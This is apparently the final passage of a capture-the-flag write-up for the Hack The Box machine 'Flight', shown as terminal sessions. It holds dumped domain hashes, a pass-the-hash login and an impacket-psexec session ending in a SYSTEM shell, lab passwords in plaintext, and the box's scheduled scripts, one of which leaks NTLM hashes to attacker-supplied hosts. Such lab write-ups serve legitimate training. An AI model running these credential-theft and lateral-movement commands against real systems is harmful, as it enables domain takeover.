krbtgt:502:aad3b435b51404eeaad3b435b51404ee:6a2b6ce4d7121e112aeacbc6bd499a7f:::
S.Moon:1602:aad3b435b51404eeaad3b435b51404ee:f36b6972be65bc4eaa6983b5e9f1728f:::
R.Cold:1603:aad3b435b51404eeaad3b435b51404ee:5607f6eafc91b3506c622f70e7a77ce0:::
--snip--
G0$:aes256-cts-hmac-sha1-96:11ad9a25157bdc6e7fd9df6c0872c33d790f7660c6f5e6ea526996b808e4d7bb
G0$:aes128-cts-hmac-sha1-96:fa0d7c35e273ae2121d1e3c54b19c3cf
G0$:des-cbc-md5:463d9edadc20e308
[*] Cleaning up...
┌──(puck㉿kali)-[~/htb/flight]
Shell
Those hashes work for a pass the hash attack:
┌──(puck㉿kali)-[~/htb/flight]
└─$ nxc smb flight.htb -u administrator -H aad3b435b51404eeaad3b435b51404ee:43bbfc530bab76141b12c8446e30c17c
SMB 10.10.11.187 445 G0 [*] Windows 10 / Server 2019 Build 17763 x64 (name:G0) (domain:flight.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.187 445 G0 [+] flight.htb\administrator:43bbfc530bab76141b12c8446e30c17c (Pwn3d!)
It shows Pwn3d! because the creds are good and this is an administrator account.
psexec.py works to get a shell from here:
┌──(puck㉿kali)-[~/htb/flight]
└─$ impacket-psexec administrator@flight.htb -hashes aad3b435b51404eeaad3b435b51404ee:43bbfc530bab76141b12c8446e30c17c
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Requesting shares on flight.htb.....
[*] Found writable share ADMIN$
[*] Uploading file FQixGuoG.exe
[*] Opening SVCManager on flight.htb.....
[*] Creating service dYER on flight.htb.....
[*] Starting service dYER.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.2989]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami
nt authority\system
C:\Windows\system32> hostname
g0
C:\Windows\system32>
That was Fun 🙂
Beyond root
xfreerdp /v:10.10.11.187:3389 /u:puck /p:Start123! /w:1566 /h:968n
After reboot, a scheduled task runs every minute: powershell.exe -c "C:\users\administrator\contacts\trigger.ps1"
trigger.ps1 contains:
# Collect every IPv4-looking string from the .ini files dropped in the shared folder
$pattern = "([0-9]{1,3}\.){3}[0-9]{1,3}"
$ips = @()
if (test-path -path C:\shared\*.ini){
    gc C:\Shared\*.ini| % {
        if (($_ -match $pattern)) {
            $ips += [regex]::Match($_, $pattern).Value
        }
    }
}
# Connect to each IP as c.bum, which is what leaks the Net-NTLMv2 to the attacker's SMB listener
foreach ($ip in $ips){
    net use * \\$ip\aa /user:flight.htb\c.bum Tikkycoll_431012284
}
# Clean out anything in the share older than two minutes
$DateToDelete = (get-date).AddMinutes(-2)
Get-ChildItem C:\shared | Where-Object { $_.LastWriteTime -lt $DatetoDelete } | Remove-Item
Also after reboot, a scheduled task runs every 5 minutes: powershell.exe -c "C:\users\administrator\contacts\wipe.ps1"
wipe.ps1 contains:
# Reset both Apache vhosts from the pristine copies kept under the administrator's profile
Remove-Item "C:\xampp\htdocs\*" -Recurse -Force -Confirm:$false
Copy-Item -Path "C:\users\administrator\videos\flight.htb" -Destination "C:\xampp\htdocs\" -Recurse
Copy-Item -Path "C:\users\administrator\videos\school.flight.htb" -Destination "C:\xampp\htdocs\" -Recurse
# Reset the IIS development site and re-grant c.bum write access to it
Remove-Item "C:\inetpub\development" -Recurse -Force -Confirm:$false
Copy-Item -path "C:\users\administrator\videos\development" -Destination "C:\inetpub\development\" -recurse
cmd /c 'icacls "C:\inetpub\development" /grant flight.htb\c.bum:(OI)(CI)W /T'